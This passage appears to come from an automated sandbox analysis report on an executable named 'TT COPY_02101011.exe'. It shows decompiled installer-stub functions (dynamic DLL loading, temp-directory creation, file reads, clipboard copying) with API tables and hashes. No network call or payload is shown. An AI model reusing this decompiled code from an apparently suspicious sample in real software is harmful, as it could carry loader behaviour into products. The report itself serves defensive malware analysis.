                                                • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E00401F51(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t18;
                                                				struct HINSTANCE__* _t25;
                                                				void* _t26;
                                                				struct HINSTANCE__* _t29;
                                                				CHAR* _t31;
                                                				intOrPtr* _t32;
                                                				void* _t33;
                                                
                                                				_t26 = __ebx;
                                                				asm("sbb eax, 0x42ec18");
                                                				 *(_t33 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L14:
                                                					E00401423();
                                                					L15:
                                                					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                                                					return 0;
                                                				}
                                                				_t31 = E004029E8(0xfffffff0);
                                                				 *(_t33 + 8) = E004029E8(1);
                                                				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                                					L3:
                                                					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                                					_t29 = _t18;
                                                					if(_t29 == _t26) {
                                                						_push(0xfffffff6);
                                                						goto L14;
                                                					}
                                                					L4:
                                                					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                                					if(_t32 == _t26) {
                                                						E00404CC9(0xfffffff7,  *(_t33 + 8));
                                                					} else {
                                                						 *(_t33 - 4) = _t26;
                                                						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                                							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                                							if( *_t32() != 0) {
                                                								 *(_t33 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                                						FreeLibrary(_t29);
                                                					}
                                                					goto L15;
                                                				}
                                                				_t25 = GetModuleHandleA(_t31); // executed
                                                				_t29 = _t25;
                                                				if(_t29 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}











                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID: B
                                                • API String ID: 2987980305-3806887055
                                                • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                                • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                				struct _SECURITY_ATTRIBUTES** _t10;
                                                				int _t19;
                                                				struct _SECURITY_ATTRIBUTES* _t20;
                                                				signed char _t22;
                                                				struct _SECURITY_ATTRIBUTES* _t23;
                                                				CHAR* _t25;
                                                				struct _SECURITY_ATTRIBUTES** _t29;
                                                				void* _t30;
                                                
                                                				_t23 = __ebx;
                                                				_t25 = E004029E8(0xfffffff0);
                                                				_t10 = E004054B2(_t25);
                                                				_t27 = _t10;
                                                				if(_t10 != __ebx) {
                                                					do {
                                                						_t29 = E00405449(_t27, 0x5c);
                                                						 *_t29 = _t23;
                                                						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                						if(_t19 == 0) {
                                                							if(GetLastError() != 0xb7) {
                                                								L4:
                                                								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                							} else {
                                                								_t22 = GetFileAttributesA(_t25); // executed
                                                								if((_t22 & 0x00000010) == 0) {
                                                									goto L4;
                                                								}
                                                							}
                                                						}
                                                						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                						 *_t29 = _t20;
                                                						_t27 =  &(_t29[0]);
                                                					} while (_t20 != _t23);
                                                				}
                                                				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                					SetCurrentDirectoryA(_t25); // executed
                                                				}
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                  • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004054C0
                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 3751793516-47812868
                                                • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                                • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                				signed int _t11;
                                                				int _t14;
                                                				signed int _t16;
                                                				void* _t19;
                                                				CHAR* _t20;
                                                
                                                				_t20 = _a4;
                                                				_t19 = 0x64;
                                                				while(1) {
                                                					_t19 = _t19 - 1;
                                                					_a4 = 0x61736e;
                                                					_t11 = GetTickCount();
                                                					_t16 = 0x1a;
                                                					_a6 = _a6 + _t11 % _t16;
                                                					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                					if(_t14 != 0) {
                                                						break;
                                                					}
                                                					if(_t19 != 0) {
                                                						continue;
                                                					}
                                                					 *_t20 =  *_t20 & 0x00000000;
                                                					return _t14;
                                                				}
                                                				return _t20;
                                                			}









                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405644
                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3263382165
                                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E004030AF(void* __eflags) {
                                                				void* _t2;
                                                				void* _t5;
                                                				CHAR* _t6;
                                                
                                                				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                				E00405B89(_t6);
                                                				_t2 = E0040548B(_t6);
                                                				if(_t2 != 0) {
                                                					E0040541E(_t6);
                                                					CreateDirectoryA(_t6, 0); // executed
                                                					_t5 = E00405631("1033", _t6); // executed
                                                					return _t5;
                                                				} else {
                                                					return _t2;
                                                				}
                                                			}







                                                APIs
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-517883005
                                                • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                                • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				intOrPtr _t15;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t15 =  *0x42eb90; // 0x571d2c
                                                					_t6 = _t17 * 0x1c + _t15;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x42e34c =  *0x42e34c + _t12;
                                                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                                                					}
                                                				}
                                                				return 0;
                                                			}













                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                                • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00405602(CHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesA(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}






                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405606
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004055E3(CHAR* _a4) {
                                                				signed char _t3;
                                                
                                                				_t3 = GetFileAttributesA(_a4); // executed
                                                				if(_t3 != 0xffffffff) {
                                                					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t3;
                                                			}





                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403066(void* _a4, long _a8) {
                                                				int _t6;
                                                				long _t10;
                                                
                                                				_t10 = _a8;
                                                				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                                				if(_t6 == 0 || _a8 != _t10) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}






                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                                • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403098(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}





                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 96%
                                                			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t87;
                                                				unsigned int _t92;
                                                				unsigned int _t93;
                                                				int _t94;
                                                				int _t95;
                                                				long _t98;
                                                				void* _t101;
                                                				intOrPtr _t123;
                                                				struct HWND__* _t127;
                                                				int _t149;
                                                				int _t150;
                                                				struct HWND__* _t154;
                                                				struct HWND__* _t158;
                                                				struct HMENU__* _t160;
                                                				long _t162;
                                                				void* _t163;
                                                				short* _t164;
                                                
                                                				_t154 =  *0x42e344; // 0x0
                                                				_t149 = 0;
                                                				_v8 = _t154;
                                                				if(_a8 != 0x110) {
                                                					__eflags = _a8 - 0x405;
                                                					if(_a8 == 0x405) {
                                                						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                					}
                                                					__eflags = _a8 - 0x111;
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						__eflags = _a8 - 0x404;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							__eflags = _a8 - 0x7b;
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							__eflags = _a12 - _t154;
                                                							if(_a12 != _t154) {
                                                								goto L20;
                                                							}
                                                							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                							__eflags = _t87 - _t149;
                                                							_a8 = _t87;
                                                							if(_t87 <= _t149) {
                                                								L37:
                                                								return 0;
                                                							}
                                                							_t160 = CreatePopupMenu();
                                                							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                							_t92 = _a16;
                                                							__eflags = _t92 - 0xffffffff;
                                                							if(_t92 != 0xffffffff) {
                                                								_t150 = _t92;
                                                								_t93 = _t92 >> 0x10;
                                                								__eflags = _t93;
                                                								_t94 = _t93;
                                                							} else {
                                                								GetWindowRect(_t154,  &_v28);
                                                								_t150 = _v28.left;
                                                								_t94 = _v28.top;
                                                							}
                                                							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                							_t162 = 1;
                                                							__eflags = _t95 - 1;
                                                							if(_t95 == 1) {
                                                								_v60 = _t149;
                                                								_v48 = 0x429fd8;
                                                								_v44 = 0xfff;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                									__eflags = _a4 - _t149;
                                                									_t162 = _t162 + _t98 + 2;
                                                								} while (_a4 != _t149);
                                                								OpenClipboard(_t149);
                                                								EmptyClipboard();
                                                								_t101 = GlobalAlloc(0x42, _t162);
                                                								_a4 = _t101;
                                                								_t163 = GlobalLock(_t101);
                                                								do {
                                                									_v48 = _t163;
                                                									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                									 *_t164 = 0xa0d;
                                                									_t163 = _t164 + 2;
                                                									_t149 = _t149 + 1;
                                                									__eflags = _t149 - _a8;
                                                								} while (_t149 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(1, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L37;
                                                						}
                                                						__eflags =  *0x42e32c - _t149; // 0x0
                                                						if(__eflags == 0) {
                                                							ShowWindow( *0x42eb68, 8);
                                                							__eflags =  *0x42ebec - _t149; // 0x0
                                                							if(__eflags == 0) {
                                                								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                                                							}
                                                							E00403CB6(1);
                                                							goto L25;
                                                						}
                                                						 *0x4293a0 = 2;
                                                						E00403CB6(0x78);
                                                						goto L20;
                                                					} else {
                                                						__eflags = _a12 - 0x403;
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00403D44(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x42e330, _t149);
                                                						ShowWindow(_t154, 8);
                                                						E00403D12(_t154);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_v60 = 2;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t123 =  *0x42eb70; // 0x571350
                                                				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                				 *0x42e330 = GetDlgItem(_a4, 0x403);
                                                				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                                                				_t127 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x42e344 = _t127;
                                                				_v8 = _t127;
                                                				E00403D12( *0x42e330);
                                                				 *0x42e334 = E0040456B(4);
                                                				 *0x42e34c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                				if(_a8 >= 0) {
                                                					SendMessageA(_v8, 0x1001, 0, _a8);
                                                					SendMessageA(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t149) {
                                                					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00403CDD(_a4);
                                                				if(( *0x42eb78 & 0x00000003) != 0) {
                                                					ShowWindow( *0x42e330, _t149);
